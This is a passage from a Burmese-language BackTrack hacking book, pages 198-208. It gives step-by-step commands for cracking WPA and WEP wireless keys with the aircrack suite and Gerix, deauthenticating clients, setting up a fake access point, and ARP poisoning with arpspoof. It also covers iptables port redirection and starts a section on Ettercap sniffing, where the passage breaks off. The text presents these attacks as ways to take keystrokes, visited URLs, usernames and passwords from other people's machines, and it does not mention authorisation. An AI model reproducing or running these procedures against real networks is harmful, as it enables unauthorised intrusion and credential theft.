ကိုေရြးခ်ယ္ေပးပါ။ ထိ႕ု အတူ Network မွ လႊင့္ထုတ္လိုက္ေသာ Signal မ်ားသယ္ေဆာင္လာေသာ
Channel ကိုမွတ္သားထားရန္ လုိအပ္ပါမည္။ ထိုအတြက္ လိုအပ္ေသာ အခ်က္အလက္မ်ားကို Channel
Column တြင္ ရွာေဖြေတြ႕ရိွရမည္ျဖစ္သည္။ ယခုအေနရာတြင္ Channel ကို 10 ဟု သတ္မွတ္ထားမည္
ျဖစ္သည္။

198 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ထို႕ေနာက္တြင္ Airodump ကိုေမာင္းႏွင္ရမည္ျဖစ္ၿပီး ေရြးခ်ယ္ထားေသာ BSSID မွ အခ်က္အလက္


မ်ားကို ဖိုင္တစ္ဖိုင္သို႕ Copy ကူးေပးရပါမည္။ ထို႕အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ Option မ်ားကို
ေလ့လာထားရန္ လိုအပ္မည္ျဖစ္သည္။

 -c : ထို Option သည္ Channel ကိုေရြးခ်ယ္ရန္ အသံုးျပဳႏိုင္ပါသည္။ ယခုေနရာ တြင္


10 ကိုသာအသံုးျပဳမည္ျဖစ္သည္။
 -w : အသံုးျပဳမည္႕ File ကိုေရြးခ်ယ္ရန္ အသံုးျပဳႏိုင္သည္။ ယခုေနရာတြင္ wireless
attack ဟူေသာ နာမည္ကိုအသံုးျပဳမည္ျဖစ္သည္။
 -bssid : BSSID ကိုသတ္မွတ္ရန္အတြက္ ယခု Option ကိုအသံုးျပဳရပါသည္။ Clipborad
တြင္ Copy ျပဳလုပ္ထားေသာ 09:AC:90:AB:78 ကို Paste လုပ္အသံုးျပဳႏိုင္ ပါသည္။

တစ္ေပါင္းတည္းအသံုးျပဳႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

airodump-ng –c 10 –w wirelessattack –bssid 0(:AC:90:AB:78 wlan0

၉။ Terminal Window အသစ္တစ္ခုေပၚလာမည္ျဖစ္ကာ အထက္တြင္ အသံုးျပဳခဲ့ေသာ Command ကို


အရ Output ကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ ထိုဖိုင္ကို မပိတ္ဘဲ ထိုအတိုင္းထားေပးပါ။

၁၀။ Terminal Window တစ္ခုထပ္မံဖြင့္၍ Aireplay ကိုအသံုးျပဳေပးရပါမည္။ Aireplay ကိုအသံုးျပဳရန္


Command ေရးသားရန္နည္းစနစ္ကို သိရိွႏိုင္ရန္ လိုအပ္မည္ျဖစ္ၿပီး aireplay –ng –dauth 1 –a [BSSID]
–c [MAC Address] [Interface] ကိုေသခ်ာစြာေလ့လာထားရန္လိုအပ္ပါသည္။ အသံုးျပဳရန္ အတြက္
ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ၿပီး လုပ္ေဆာင္ခ်က္အေနျဖင့္ အခ်ိန္အနည္းငယ္ေပးရမည္ ျဖစ္သည္။

aireplay-ng –deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0

၁၁။ ေနာက္ဆံုးအေနျဖင့္ WPA Key ကိုထိုးေဖာက္ရန္အတြက္ Aircrack ကိုေမာင္းႏွင္ေပးရပါမည္။ -w


Option သည္ အသံုးျပဳမည္႕ Worlist ရိွမည္႕ေနရာကိုသတ္မွတ္ႏိုင္ရန္ အသံုးျပဳပါသည္။ (Wordlist
အေၾကာင္းကို မသိရိွပါက ပထမစာအုပ္ျဖစ္ေသာ Hacker မ်ား၏ထိုးေဖာက္နည္း စာအုပ္တြင္ ဖတ္ရွဳႏိုင္
ပါသည္) ထို႕ေၾကာင့္ .cap file ကိုအသံုးျပဳမည္ျဖစ္သည္။ အသံုးျပဳရမည္႕ဖိုင္ကို သတ္မွတ္ၿပီးသား ျဖစ္ပါ

မ်က္ပြင့္စာေပ 199
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

သည္။ Wirelessattack.cap ကို အသံုးျပဳႏိုင္မည္ျဖစ္သည္။ ထို႕ေၾကာင့္ ေအာက္ပါ command ကို


အသံုးျပဳေပးရမည္ျဖစ္သည္။

aircrack-ng –w ./wordlist.lst wirelessattack.cap

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ Wireless Network မွ WPA Key ကုိ Crack


လုပ္ႏိုင္ရန္အတြက္ Aircrack Suite ကိုအသံုးျပဳထားသည္ကို ေတြ႕ရမည္ျဖစ္သည္။ Aircrack သည္ WPA
Crack လုပ္ရန္အေကာင္းဆံုးေသာ Program တစ္ခုဟုလည္း သတ္မွတ္ႏိုင္ပါသည္။ Aircrack သည္္
Packets မ်ားကိုစုေဆာင္းၿပီး brute force attacking ျဖင့္ Crack လုပ္ယူျခင္းျဖစ္သည္။ Aircrack
ကိုအသံုးျပဳၿပီး ဆႏၵရိွေသာ Interface ကိုအသံုးျပဳရာတြင္ ေရြးခ်ယ္ေပးသည္။ ထို႕ေနာက္ MAC Address
ကိုေျပာင္းလဲကာ Wireless Network ကို Trick ျပဳလုပ္ကာ ေဖ်ာက္ထားႏိုင္ပါသည္။ ထိုသို႕လုပ္ေဆာင္ရန္
အတြက္ Airodump ကိုအသံုးျပဳထားသည္ကိုေတြ႕ရမည္ျဖစ္သည္။ ထို႕ေနာက္ CAP file ကိုအသံုးျပဳ၍
Password ကို Crack ျပဳလုပ္ျခင္းသာျဖစ္သည္။ ထပ္တလဲလဲလုပ္ေဆာင္ၾကည္႕ျခင္းျဖင့္ ေအာင္ျမင္မႈကို
ရရိွႏိုင္ေစမည္ျဖစ္ပါသည္။

Automating a wireless network cracking


ယခုအပိုင္းကိုလုပ္ေဆာင္ရန္အတြက္ Wireless Network တစ္ခုကို Attack ျပဳလုပ္ရန္ Gerix ကို
အသံုးျပဳမည္ျဖစ္သည္။ Gerix သည္ Aircrack လုပ္ေဆာင္ခ်က္ပင္ျဖစ္ေသာ္လည္း Graphical User
Interface (GUI) ကိုအသံုးျပဳထားျခင္းျဖစ္သည္႕အတြက္ ပိုမိုရွင္းလင္းလြယ္ကူေစမည္ျဖစ္သည္။ Back
Track OS တြင္ Default အျဖစ္ျဖင့္ Gerix ကို Install ျပဳလုပ္ထားၿပီးသားျဖစ္ကာ Wireless Network
Cracking ျပဳလုပ္ရာတြင္ ပိုမိုလ်င္ျမန္လြယ္ကူစြာ ျပဳလုပ္ႏိုင္မည္ျဖစ္သည္။

ထို႕ေၾကာင့္ အသံုးျပဳပံုကိုစတင္ေလ့လာၾကည္႕ၾကပါမည္။

၁။ Desktop ေပၚတြင္ရိွေသာ Start Menu မွ BackTrack> Exploitation Tools> Wireless Exploitation


Tools> WLAN Exploitation> Gerix-wifi-cracker-ng ကိုအဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။ ေအာက္ပါ
အတိုင္းေပၚလာမည္ျဖစ္သည္။

200 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Configuration Tab တြင္ Click ႏိွပ္ပါ။

၃။ ေပၚလာေသာ Configuration Tab ေပၚမွ ကြန္ပ်ဴတာတြင္အသံုးျပဳထာေးသာ Wireless Interface


ကိုေရြးခ်ယ္ေပးရပါမည္။

၄။ Enable/Disable Monitor Mode ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၅။ Monitor Mode တြင္ Enable ျပဳလုပ္ၿပီးျဖစ္လွ်င္ Seletct Target Network ေအာက္မွ Rescan
Networks ခလုတ္ေပၚတြင္ Click တစ္္ခ်က္ႏိွပ္ပါ။

၆။ Target Network အျဖစ္ေရြးခ်ယ္ႏိုင္ေသာ Network List ကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Target အျဖစ္


ေရြးခ်ယ္မည္႕ Network တစ္ခုကို ေရြးခ်ယ္ေပးရပါမည္။ ဤေနရာတြင္ WEP encrypted Network
ကိုေရြးခ်ယ္အသံုးျပဳျပထားပါသည္။

၇။ WEP Tab တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 201
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ Functionalities ေအာက္မွ Start Sniffng and Logging ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၉။ WEP Attacks (No Client) Subtab တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၁၀။ Start false access point authentication on victim ခလုတ္တြင္ Click ႏိွပ္ပါ။

၁၁။ Start the ChopChop attack ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၁၂။ Terminal Window ပြင့္လာမည္ျဖစ္ၿပီး Use this packet ဟုေခၚျပခဲ့လွ်င္ Y ကို Click ႏိွပ္ပါ။

၁၃။ ၿပီးဆံုးသြားေသာအခါ ရရိွလာသည္႕ .cap ဖိုင္ကို Copy လုပ္ယူပါ။

၁၄။ ထို႕ေနာက္ Create the ARP packet to be injected on the victim acess point ခလုတ္တြင္ Click
ႏိွပ္ပါ။

၁၅။ Inject the created packet on victim access point ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၁၆။ Termianl Window တစ္ခုထပ္မံေပၚလာမည္ျဖစ္ၿပီး Use this packet ဟုေမးလာပါက Y တြင္ Click
ႏိွပ္ပါ။

၁၇။ Packet မ်ားကိုဖမ္းယူေနမည္ျဖစ္သည္။ Packet မ်ား 20000 ခန္႕ဖမ္းယူရရိွၿပီးေသာအခါတြင္ Cracking


Tab တြင္ Click ႏိွပ္ပါ။

၁၈။ ထို႕ေနာက္ Aircrack-ng – Decrypt WEP password ခလုတ္တြင္ Click ႏိွပ္ပါ။

202 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုပါက WEP key ကို ရရိွေစရန္အတြက္ Gerix ကိုအစားထိုး


အသံုးျပဳျခင္းအေၾကာင္းကိုေလ့လာရမည္ျဖစ္သည္။ Gerix ကို စတင္ဖြင့္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး Monitoring
Mode Interface ကိုလည္း Enable ျပဳလုပ္ရေၾကာင္းေဖာ္ျပေပးခဲ့ပါသည္။ ထိ႕ု ေနာက္ Target ကိုေရြးခ်ယ္
ျခင္း၊ ထို႕ေနာက္ Network Traffic မ်ားကို sniffing လုပ္ျခင္းတို႕အျပင္ Chop Chop ကိုအသံုးျပဳကာ CAP
ဖိုင္မ်ားကို Generate ျပဳလုပ္ျခင္းမ်ားကိုလည္း ေဖာ္ျပေပးခဲ့ပါသည္။ ထိ႕ု ေနာက္ package 20000 ခန္႕
စုေဆာင္းၿပီးေနာက္တြင္ Brute Force ကိုအသံုးျပဳၿပီး CAP File ကို Aircrack နည္းျဖင့္ Crack ျပဳလုပ္ရ
ျခင္းလည္းျဖစ္ပါသည္။

Gerix ကိုအသံုးျပဳ၍ Terminal Window ေပၚတြင္ Command ရိုက္ထည္႕စရာမလိုပဲ WEP Key ကို Crack
ျပဳလုပ္ႏိုင္ေၾကာင္း ျပသခဲ့ၿပီးျဖစ္သည္။ ထိုသို႕အထက္ပါအတိုင္း ေဖာ္ျပထားေသာနည္းလမ္းကို အသံုးျပဳ
ျခင္းျဖင့္ WEP Secured Network ကို လွ်င္ျမန္စြာႏွင့္ ထိေရာက္စြာ ရယူႏိုင္ပါသည္။

Accessing clients using a fake AP


ယခုအပိုင္းတြင္ Gerix ကိုထပ္မံအသံုးျပဳမည္ျဖစ္ၿပီး Fake Access Point (Access Point အတု တစ္ခု)
တည္ေဆာက္ပံုကိုေဖာ္ျပေပးသြားမည္ျဖစ္သည္။ Fake Access Point ကိုအသံုးျပဳျခင္းျဖင့္ ထို Access
Point သုိ႕၀င္ေရာက္သည္႕ ကြန္ပ်ဴတာတိုင္း၏ Information မ်ားကို စုေဆာင္းႏိုင္မည္ျဖစ္သည္။
သတိထားရမည္႕အခ်က္မွာ Gerix သည္ Aircrack ပင္ျဖစ္ၿပီး command မ်ားကိုအသံုးမျပဳဘဲ Graphical
User Interface အေျချပဳ၍ အစားထိုးအသံုးျပဳထားေသာ Program တစ္ခုပင္ျဖစ္ပါသည္။ ထို႕ေၾကာင့္ လုပ္
ေဆာင္ပံုကို အဆင့္အလိုက္ေလ့လာၾကည္႕ၾကပါမည္။

၁။ BackTrack ၏ Desktop ေပၚတြင္ရိွေသာ Start Menu မွ BackTrack> Exploitation Tools> Wireless


Exploitation Tools> WLAN Exploitation> gerix-wifi-cracker-ng တို႕ကို အဆင့္ဆင့္ေရြးခ်ယ္ေပးရ
ပါမည္။ ထုိအခါ ေအာက္ေဖာ္ျပပါပံုကိုေတြ႕ရိွရမည္ျဖစ္သည္။

မ်က္ပြင့္စာေပ 203
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Configuration Tab ေပၚတြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၃။ Configuration Tab ေပၚမွအသံုးျပဳေနေသာ Wireless Interface ကိုေရြးခ်ယ္ေပးပါ။

၄။ Eable/Disable Monitor Mode ခလုတ္တြင္ တစ္ခ်က္ႏိွပ္ျခင္းျဖင့္ Enable ျဖစ္ေအာင္ ျပဳလုပ္ရပါမည္။

၅။ Moinitor Mode သည္ Enable ျဖစ္သြားေသာအခါတြင္ Select Target Network ေအာက္မွ Rescan
Networks ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ေပးရပါမည္။

၆။ ထိုအခါ ထိုးေဖာက္ႏိုင္မည္႕ Network မ်ားကို List လုပ္ေဖာ္ျပေပးမည္ျဖစ္သည္။ Target ျပဳလုပ္မည္႕


Network ကိုေရြးခ်ယ္ေပးရပါမည္။ ဤေနရာတြင္ WEP encrypted Network တစ္ခုကို နမူနာအျဖစ္
ေဖာ္ျပေပးမည္ျဖစ္သည္။ သို႕ရာတြင္ ႀကိဳက္ႏွစ္သက္ရာ ေရြးခ်ယ္အသံုးျပဳႏိုင္ပါသည္။

၇။ Fake AP Tab တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။ ေအာက္ေဖာ္ျပပါပံုအတိုင္းေပၚလာသည္ကို ေတြ႕ရပါမည္။

204 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ Access Point ၏ ESSID ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ personlnetwork ဟုေပးထားပါ


သည္။ သိ႕ု ေသာ္ ႀကိဳက္ႏွစ္သက္ရာ အမည္တစ္ခုခုကို သတ္မွတ္ေပးထားႏိုင္ပါသည္။

၉။ အျခားေသာ Option မ်ားကို Default အျဖစ္အသံုးျပဳႏိုင္ပါသည္။ ထို႕ေနာက္ Fake Access Point ကို
စတင္ရန္အတြက္ Start Fake Access Point ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ေပးပါ။ ေအာက္ေဖာ္ျပပါ ပံုတြင္
ၾကည္႕ရွဳႏိုင္ပါသည္။

အလုပ္လုပ္ေဆာင္ပုံကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ Fake Access Point ကိုတည္ေဆာက္ရန္အတြက္


Gerix ကိုပင္အသံုးျပဳထားသည္ကိုေတြ႕ရမည္ျဖစ္ပါသည္။ Fake Access Point တည္ေဆာက္ထားျခင္း
သည္ မသကၤာဖြယ္ User မ်ားမွ Information မ်ားရရိွႏိုင္ရန္ အေကာင္းဆံုးနည္းလမ္းတစ္ခုလည္း
ျဖစ္ပါသည္။ Fake Access Point ကိုအသံုးျပဳရျခင္း၏ရည္ရြယ္ခ်က္မွာ မိမိ၏ Network တြင္အသံုးျပဳ
သူမ်ားအတြက္ အားသာခ်က္မ်ားကို ျဖစ္ေစပါမည္။ Gerix ကိုအသံုးျပဳျခင္းျဖင့္ Fake Access Point
တစ္ခုကို တည္ေဆာက္ရတြင္ တိုေတာင္းျမန္ဆန္ၿပီး လြယ္ကူစြာအသံုးျပဳႏိုင္မည္ျဖစ္ပါသည္။

မ်က္ပြင့္စာေပ 205
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

URL traffic manipulation


ယခုအပိုင္းတြင္မူ URL traffic manipulation attack အေၾကာင္းကိုလုပ္ေဆာင္ၾကည္႕ၾကပါမည္။ URL
traffic manipulation ဆိုသည္မွာ Man-in-the-middle (MITM) attack ျဖင့္အလြန္ဆင္တူေသာ
တိုက္ခိုက္ျခင္းတစ္မ်ိဳးျဖစ္ၿပီး Internet အတြက္ Traffic မ်ားကို အသံုးျပဳေနေသာ မိမိ၏ Machine သိ႕ု
ဦးစြာလမ္းလႊဲေစႏိုင္ရန္အတြက္ Route ျပဳလုပ္ျခင္းလည္း ျဖစ္ပါသည္။ ထိုသို႕တိုက္ခိုက္ျခင္းကို ARP
poisoning ျဖင့္ အသံုးျပဳႏိုင္ပါသည္။ ARP poisoning ဆိုသည္မွာ နည္းပညာတစ္ခုျဖစ္ၿပီး ARP message
မ်ားကို Local Network ေပၚတြင္ အသံုးျပဳသူထံသို႕ ေပးပို႕ေပးေစႏိုင္ပါသည္။ ထိုသို႕ ျပဳလုပ္ရန္အတြက္
Arpspoof ကိုအသံုးျပဳႏိုင္ပါသည္။ ထိ႕ု ေၾကာင့္ URL traffic manipulation လုပ္ငန္းစဥ္တစ္ခုကို
ေဆာင္ရြက္ရန္အတြက္

၁။ Terminal Window ကိုဖြင့္ၿပီး မိမိတို႕၏ Machine တို႕မွ Traffic မ်ားကို Route ျပဳလုပ္ခြင့္ျပဳေစရန္
အတြက္ IP table မ်ားကို Configure ျပဳလုပ္ႏိုင္ေစရန္ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

၂။ ထို႕ေနာက္ တိုက္ခိုက္မည္႕ Machine မွ Default gateway သို႕ ပိ႕ု လႊတ္ေသာ Traffic မ်ားကို poison
ျဖစ္ေစရန္အတြက္ Arpspoof ကိုေမာင္းႏွင္ေပးရပါမည္။ ယင္းဥပမာတြင္ Local Network အတြင္းတြင္
192.168.10.115 ဟု IP Address သတ္မွတ္ထားေသာ Windows 7 တင္ထားေသာ ကြန္ပ်ဴတာကို
အသံုးျပဳ၍ ေဖာ္ျပသြားပါမည္။ Arpspoof ကိုအသံုးျပဳရာတြင္ Option ႏွစ္ခုကို ေအာက္ေဖာ္ျပပါအတိုင္း
အသံုးျပဳႏိုင္မည္ျဖစ္သည္။

 -i : ၄င္း Option သည္ Target Interface (တိုက္ခိုက္မည္႕ Interface)


ကိုေရြးခ်ယ္ရန္အသံုးျပဳႏိုင္ပါသည္။ ယခုေနရာတြင္ wlan0 ကိုအသံုးျပဳပါမည္။
 -t : ထို Option သည္ Target ကိုသတ္မွတ္ေပးႏိုင္ရန္အတြက္ အသံုးျပဳႏိုင္ပါ သည္။
ထို႕ေၾကာင့္ ႏွစ္ခုစလံုးကိုေပါင္းစပ္ၿပီး ေအာက္ပါအတိုင္းေရးသားေပးရပါမည္။

sudo arpspoof –I wlan0 –t 192.168.10.115 192.168.10.1

206 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

မွတ္ခ်က္။ ။အထက္တြင္ေရးသားထားေသာ Command ၏ ပံုစံမွာ arpspoof –i [interface] –t


[target IP address] [destination IP address] ျဖစ္ပါသည္။

၃။ ထို႕ေနာက္တြင္ အျခားေသာ Arpspoof Command တစ္ခုကို ယခင္အသံုးျပဳခဲ့ေသာ Command ကို


ေရွ႕ဆက္ႏုိင္ေစရန္ destination မွ Traffic မ်ားကို ရယူေစရန္ အသံုးျပဳရပါမည္။ ထို႕အျပင္ BackTrack
Machine သို႕ Traffic မ်ားကို Route ျပဳလုပ္ေစရမည္ျဖစ္သည္။ ယခုဥပမာတြင္ အသံုးျပဳေနေသာ စက္၏
IP Address ကို 192.168.10.110 ဟုယူဆပါမည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါ
မည္။

sudo arpspoof –i wlan0 –t 192.168.10.1 192.168.10.110

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ Attack ျပဳလုပ္မည္႕ စက္မွ BackTrack အသံုးျပဳ


ေနေသာ လက္ရိွ Machine သို႕မျပတ္တမ္း Route Back ျဖစ္ေစရန္ ARP Poisoning ကို Arpspoof
Command ကိုအသံုးျပဳ၍ အသံုးျပဳျခင္းျဖစ္သည္။ Traffic တစ္ခုကို Re-route ျပဳလုပ္ၿပီးေသာ အခါ
တိုက္ခိုက္မည္႕ Machine သို႕ ရိုက္ထည္႕ေသာ Keyboard မွ Key မ်ားကို ခိုးယူျခင္းအပါအ၀င္
၀င္ေရာက္ၾကည္႕ရွဳေသာ Web Site မ်ားကိုျပန္လွန္ၾကည္႕ရွဳျခင္းႏွင့္ အျခားေသာ လုပ္ေဆာင္ခ်က္မ်ားကို
ၾကည္႕ရွဳႏိုင္ေစမည္ျဖစ္သည္။

Port redirection
ယခုအပိုင္းတြင္ BackTrack ကိုအသံုးျပဳၿပီး Port forwarding သို႕မဟုတ္ Port mapping ဟုေခၚ ဆိုေသာ
Port redirection လုပ္ေဆာင္ခ်က္ကို လုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္သည္။ Port redirection ဆိုသည္မွာ
Packet တစ္ခုကို Port တစ္ခုသို႕လမ္းလႊဲျခင္းျဖစ္ၿပီး ဥပမာအားျဖင့္ Port 80 မွ packet ကို ကြျဲ ပားသည္႕
Port တစ္ခုျဖစ္ေသာ 8080 သို႕၄င္း၏ Traffic မ်ားကို လမ္းလႊဲေပးျခင္းျဖစ္သည္။ ထိုသ႕ို ျပဳလုပ္ျခင္းမွ
ရရိွေသာအက်ိဳးအျမတ္မွာ မ်ားျပားလွၿပီး တိုက္ခိုက္မည္႕စက္၏ Traffic မ်ားကို လံုၿခံဳေသာ port မ်ားမွ
မလံုၿခံဳေသာ Port မ်ားသို႕လမ္းလႊဲေပးႏိုင္သည္။ ထို႕ေၾကာင့္ သတ္မွတ္ထားေသာ စက္ေပၚတြင္ သတ္မွတ္
ထားေသာ Port သို႕ Traffic မ်ားကို လမ္းလႊဲမႈမ်ားကို လုပ္ေဆာင္ေစႏိုင္မည္ ျဖစ္ပါသည္။ ထိုကဲ့သို႕ port
redirection/ forwarding လုပ္ေဆာင္ခ်က္မ်ားကို စတင္လုပ္ေဆာင္ရန္အတြက္

မ်က္ပြင့္စာေပ 207
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ Terminal Window ကိုဖြင့္ၿပီး မိမိတို႕၏စက္ကို Traffic Route ျပဳလုပ္ရန္ IP Tables မ်ားကို ျပင္ဆင္
ေစႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

၂။ ထို႕ေနာက္ Defualt Gateway သို႕စီးဆင္းေနေသာ Traffic မ်ားကို Poison ျပဳလုပ္ရန္အတြက္


Arpspoof Command ကိုအသံုးျပဳရပါမည္။ ယခုေနရာတြင္ Gateway ၏ Ip Address ကို 192.168.10.1
ဟုယူဆထားမည္ျဖစ္သည္။ Arpspoof တြင္ Option ႏွစ္ခုရိွၿပီး -i option သည္ တိုက္ခိုက္မည္႕ Interface
ကိုေရြးခ်ယ္ေပးေစႏိုင္သည္။ ယခုေနရာတြင္ wlan0 ဟုသတ္မွတ္ေပးထားပါသည္။ ထို႕ေနာက္ ေအာက္ပါ
Command ကိုအသံုးျပဳရမည္ျဖစ္သည္။

sudo arpspoof –i wlan0 192.168.10.1

မွတ္ရန္။ ။အထက္တြင္အသံုးျပဳထားေသာ Command ၏ ပံုစံမွာ arpspoof –i [interface]


[destination Ip Address] ျဖစ္ပါသည္။

၃။ ထို႕ေနာက္ Arpspoof command ေနာက္တစ္ခုကို Destination မွ Traffic ရရိွယူရန္ႏွင့္ လက္ရိွ


BackTrack အသံုးျပဳေနေသာ စက္မွ လက္ခံႏိုင္ရန္အတြက္ အသံုးျပဳေပးရပါမည္။ ယခုဥပမာတြင္
BackTrack အသံုးျပဳေနေသာ မိမိကြန္ပ်ဴတာ၏ IP Address ကို 192.168.10.110 ဟုယူဆမည္ျဖစ္သည္႕
အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳေပးရပါမည္။

iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 8080

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ ARP poisoning ကို Arpspoof ႏွင့္ IPTables routing


တို႕ကိုအသံုးျပဳ၍ Network ကုိ port 80 မွ port 8080 သို႕ traffic ကို လမ္းလႊဲႏိုင္ပါသည္။ အက်ိဳးေက်းဇူး
အားျဖင့္ Attack ျပဳလုပ္ရာတြင္ Keyboard ကိုႏွိပ္ရာတြင္ Key မ်ားကိုမွတ္သားျခင္းစသည္႕တို႕ကဲ့သို႕ေသာ
လုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေဆာင္ေစႏိုင္ရန္အတြက္ မလံုၿခံဳေသာ Port သို႕လမ္းလႊဲေပးထားျခင္းျဖစ္
သည္။ ထို႕ေၾကာင့္ ထိုကဲ့သို႕ Port Redirection နည္းလမ္းျဖင့္ အျမတ္ထုတ္သြားပံုကို ေလ့လာႏိုင္မည္
ျဖစ္ပါသည္။

208 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Sniffing network traffic


ယခုအပိုင္းတြင္မူ Network traffic မ်ားကို Sniffing ျပဳလုပ္ပံုကို ေလ့လာရမည္ျဖစ္သည္။ Network traffic
ကို Sniff ျပဳလုပ္ျခင္းဆိုသည္မွာ Network packets မ်ားကို intercept ျပဳလုပ္ျခင္း အပါအ၀င္၊ ၄င္းတို႕ကို
Analyze ျပဳလုပ္ျခင္း၊ Traffic မ်ားကို လိုအပ္ပါက Decode ျပဳလုပ္ျခင္းႏွင့္ Packet အတြင္းတြင္ပါ၀င္ေသာ
အခ်က္အလက္မ်ားကိုၾကည္႕ရွဳႏိုင္ေစသည္႕လုပ္ငန္းေဆာင္တာမ်ားပါ ပါ၀င္ပါ သည္။ Traffic Sniffing
သည္ မ်ားေသာအားျဖင့္ Website မ်ားသို႕ သြားေရာက္လည္ပတ္မႈမ်ားမွ Target တစ္ခု၏ အခ်က္အလက္
မ်ားကို စုေဆာင္းရာတြင္ အသံုး၀င္ေလ့ရိွပါသည္။ ထိုေနရာမွ ၀င္ေရာက္ၾကည္႕ရွဳထားေသာ URL မ်ား၊
Username မ်ား၊ Password မ်ားႏွင့္ အျခားေသာ အခ်က္အလက္အေသးစိပ္ကို ၾကည္႕ရွဳရန္အတြက္
အသံုးျပဳႏိုင္ပါသည္။

ယခုအပိုင္းတြင္ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ettercap ကိုအသံုးျပဳမည္ျဖစ္သည္။ ထို႕အျပင္ Wireshark


ကိုလည္း အသံုးျပဳႏိုင္ပါသည္။ လက္ေတြ႕ေလ့လာၾကည္႕ေသာအခါတြင္ Ettercap သည္ ပိုမိုနားလည္ရ
လြယ္ကူေစၿပီး sniffing ဆိုင္ရာဥပေဒသမ်ားႏွင့္လည္း ကိုက္ညီပါသည္။ ထို႕အျပင္ မည္သည္ကိုအသံုးျပဳ
သည္ျဖစ္ေစ၊ Sniffing လုပ္ငန္းစဥ္မ်ားကို ေသခ်ာစြာေလ့လာေစျခင္းျဖင့္ အျခားေသာ Wireshark ကဲ့သို႕
ေသာ Tool မ်ားျဖင့္ အသံုးျပဳသည္႕အခါတြင္လည္း လြယ္ကူစြာ လုပ္ေဆာင္ႏိုင္ေစမည္ျဖစ္ပါသည္။

ယခုသင္ခန္းစာကိုေလ့လာရန္အတြက္ Wireless Network Card တစ္ခုကိုလိုအပ္မည္ျဖစ္ပါသည္။


သို႕ရာတြင္ Wireless Network ကုိအသံုးမျပဳဘဲ Wired Network ကိုလည္း အသံုးျပဳေစႏိုင္မည္ျဖစ္ပါ
သည္။ ထိ႕ု ေၾကာင့္ Ettercap ကိုအသံုးျပဳ၍ Network traffic sniffing အေၾကာင္းကို စတင္လုပ္ေဆာင္
ၾကည္႕ၾကပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ Ettercap ကို -g option ကိုအသံုးျပဳၿပီး GUI Mode ျဖင့္ စတင္ႏိုင္ေစရန္
